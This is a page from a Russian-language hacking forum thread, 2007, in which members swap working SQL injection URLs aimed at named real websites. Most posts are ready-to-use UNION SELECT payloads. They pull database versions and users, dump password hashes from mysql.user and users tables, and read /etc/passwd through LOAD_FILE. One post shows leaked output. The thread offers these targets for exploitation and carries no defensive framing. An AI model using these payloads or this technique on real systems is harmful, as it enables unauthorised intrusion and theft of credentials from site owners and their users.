HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3201  
Старый 29.09.2007, 19:47
Kaimi
Познавший АНТИЧАТ
Регистрация: 23.08.2007
Сообщений: 1,237
С нами: 9851426

Репутация: 1676


По умолчанию

Цитата:
и шоб не оффтопить вот ещё она. нераскрученная
http://www.ihrc.org.uk/show.php?id=650'
Cойдет?
http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,database(),version(),user(),5,6 ,7,8,9,10,11,12/*
 
Ответить с цитированием

  #3202  
Старый 29.09.2007, 20:38
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами: 9920546

Репутация: 1796
По умолчанию

Цитата:
Сообщение от fobofob  
Впервые вижу уязвимость в html скрипте 8),сам раскрутить не смог,может у кого получится ;)

код:

http://www.vakansii.com.ua/showArticleNames.html?id=24+order+by+2/*
Там третья версия:
Код:
http://www.vakansii.com.ua/showArticleNames.html?id=24+OR 1=IF(SUBSTRING(VERSION(),1,1)=3,1,0)/*
А в третьей версии ни подзапросов ни юниона нет... Можно если комуто совсем надо только подбирать ;)
__________________
Кто я?..
 
Ответить с цитированием

  #3203  
Старый 29.09.2007, 20:46
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами: 9920546

Репутация: 1796
По умолчанию

Код:
http://www.miga.org/sitelevel2/level2.cfm?id=1069%27
Там Oracle. Я тут не рулю...
__________________
Кто я?..
 
Ответить с цитированием

  #3204  
Старый 29.09.2007, 21:04
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами: 10243046

Репутация: 3033


По умолчанию

Ув. господа требуются добровольцы для апгрейта антибояна. С 300 по 323 стр. Желающие добро пожаловать в осику 480596. Спасибо
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #3205  
Старый 29.09.2007, 21:14
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами: 9920546

Репутация: 1796
По умолчанию

Код:
http://gamers.eurogamer.net/giveaways.php?id=-8 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(' ',VERSION(),DATABASE(),USER()),'1'),'1'),4,5,6,7,8,9,10,11/*
4.1.13-standard-log : eurogamer : masterwww@192.168.1.3
__________________
Кто я?..
 
Ответить с цитированием

  #3206  
Старый 30.09.2007, 02:11
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
С нами: 10374086

Репутация: 1745


По умолчанию

Код:
http://www.hamo.es/es/news.php?id=-2+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.columns/*
 
Ответить с цитированием

  #3207  
Старый 30.09.2007, 12:40
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
С нами: 10566621

Репутация: 1198


По умолчанию

thinkpackaging.com Провайдер, регистрирует доменные имена и предоставляет хостинг =) п.с. хотел найти что-нибудь подходящее, дорого ибо =)
Код:
http://www.thinkpackaging.com/view_company.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,version(),22,23,24+from+company/*
 
Ответить с цитированием

  #3208  
Старый 30.09.2007, 16:48
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
С нами: 9881483

Репутация: 569
По умолчанию

код:


http://goroskop.a.org.ua/?id=-12+union+select+1,2,CAST(concat_ws(0x3a,version(), user(),database())+AS+BINARY),4/*
 
Ответить с цитированием

  #3209  
Старый 30.09.2007, 16:57
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами: 9828237

Репутация: 778
По умолчанию

Код:
http://www.endiama.co.ao/news.php?id=-1+union+select+1,2,3,4,aes_decrypt(aes_encr ypt (version(),0x 71),0x71)/*
Код:
http://www.endiama.co.ao/news.php?id=-1+union+selec t+1,2,p assword,4,5+from+users/*
Код:
http://newwebstudio.com/bg/Services.php?id=-1+union+select+1,2,AES_DECRY PT(AES_ENCRYPT(VE RSION(),0x71),0x71),4,5/*
Код:
http://www.garantovany-dodavatel.com/www/forum_read.php?id=-1+union+select+1,2,3,4 ,concat (user(),0x3a,version(),0x 3a,database()),6/*
 
Ответить с цитированием

  #3210  
Старый 30.09.2007, 22:12
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
С нами: 10305026

Репутация: 187
По умолчанию

источник: http://www.xakep.ru/post/40386/default.asp
------------------------------------
ActiveKB Knowledgebase 2.x
------------------------------------

Код:
http://support.lexiconn.com/kb/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(%200x2f6574632f706173737764),3,4,5,6,7+members/*

Код:
http://www.randomhouse.com/about/faq/index.php?ToDo=browse&catId=-20+union+select+1,password,user,4,5,6,7%20from%20mysql.user/*

Код:
http://www.booklounge.ca/about/faq/index.php?ToDo=browse&catId=-10+union+select+1,password,user,4,5,6,7%20from%20mysql.user/*

Код:
http://olseninvest.com/faq/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(%200x2f6574632f706173737764),3,4,5,6,7%20from%20mysql.user/*
----------------------------------
Код:
http://www.lcn.biz/faq/index.php?ToDo=browse&catId=-10+union+select+1,user,password,4,5,6,7%20from%20mysql.user/*
Код:
http://www.lcn.biz/faq/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7%20from%20mysql.user/*
----------------------------------

Код:
http://www.fastsurf.com/faqs/index.php?ToDo=browse&catId=-10+union+select+1,password,username,4,5,6,7%20from%20user/*
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.